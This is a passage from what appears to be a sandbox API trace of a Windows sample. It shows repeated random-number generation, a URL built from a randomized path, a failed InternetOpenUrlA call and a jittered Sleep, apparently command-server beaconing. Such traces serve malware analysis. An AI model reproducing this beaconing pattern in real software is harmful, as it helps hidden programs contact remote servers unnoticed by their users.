0x7ffc5bcc36b0 [0256.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17cea, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a17cea) returned 0x0 [0256.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0256.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0256.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0256.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.958] GetProcessHeap () returned 0x440000 [0256.958] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473980 [0256.958] lstrcpyA (in: lpString1=0x473980, lpString2=" |¡\x03" | out: lpString1=" |¡\x03") returned=" |¡\x03" [0256.958] lstrcatA (in: lpString1=" |¡\x03", lpString2="/nuc1lk4oe78xVu9wWstv7gtU/4mp5Ph9mAtt3bn4jUba3mbjrx6g5Zjogmek687Nrv83rugc/uq5CbgbwoqSphcn0xs1du7cq6wjT2bhoYD4/" | out: lpString1=" |¡\x03/nuc1lk4oe78xVu9wWstv7gtU/4mp5Ph9mAtt3bn4jUba3mbjrx6g5Zjogmek687Nrv83rugc/uq5CbgbwoqSphcn0xs1du7cq6wjT2bhoYD4/") returned=" |¡\x03/nuc1lk4oe78xVu9wWstv7gtU/4mp5Ph9mAtt3bn4jUba3mbjrx6g5Zjogmek687Nrv83rugc/uq5CbgbwoqSphcn0xs1du7cq6wjT2bhoYD4/" [0256.958] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0256.958] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl=" |¡\x03/nuc1lk4oe78xVu9wWstv7gtU/4mp5Ph9mAtt3bn4jUba3mbjrx6g5Zjogmek687Nrv83rugc/uq5CbgbwoqSphcn0xs1du7cq6wjT2bhoYD4/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0256.958] GetProcessHeap () returned 0x440000 [0256.958] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473980 | out: hHeap=0x440000) returned 1 [0256.958] GetProcessHeap () returned 0x440000 [0256.958] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17ca0 | out: hHeap=0x440000) returned 1 [0256.958] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0256.959] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0257.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0257.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0257.121] Sleep (dwMilliseconds=0x1b83e) [0257.294] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0257.294] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.294] GetProcessHeap () returned 0x440000 [0257.294] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16800 [0257.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16801, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a16801) returned 0x0 [0257.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16812, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a16812) returned 0x0 [0257.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.300] GetProcAddress 